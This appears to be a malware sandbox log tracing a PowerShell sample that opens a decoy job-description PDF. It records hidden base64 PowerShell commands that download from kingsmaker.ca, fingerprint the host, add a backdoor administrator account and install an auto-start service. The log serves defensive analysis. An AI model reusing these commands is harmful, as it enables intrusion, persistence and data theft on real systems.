Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: kingsmaker_4.ca.ps1

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4364.tmp" "c:\Users\user\AppData\Local\Temp\qlxhihga\CSCB3BD9BA87EAD4F1291288FCEAEB15417.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf"
Source: unknown	Process created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: unknown	Process created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi7
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand 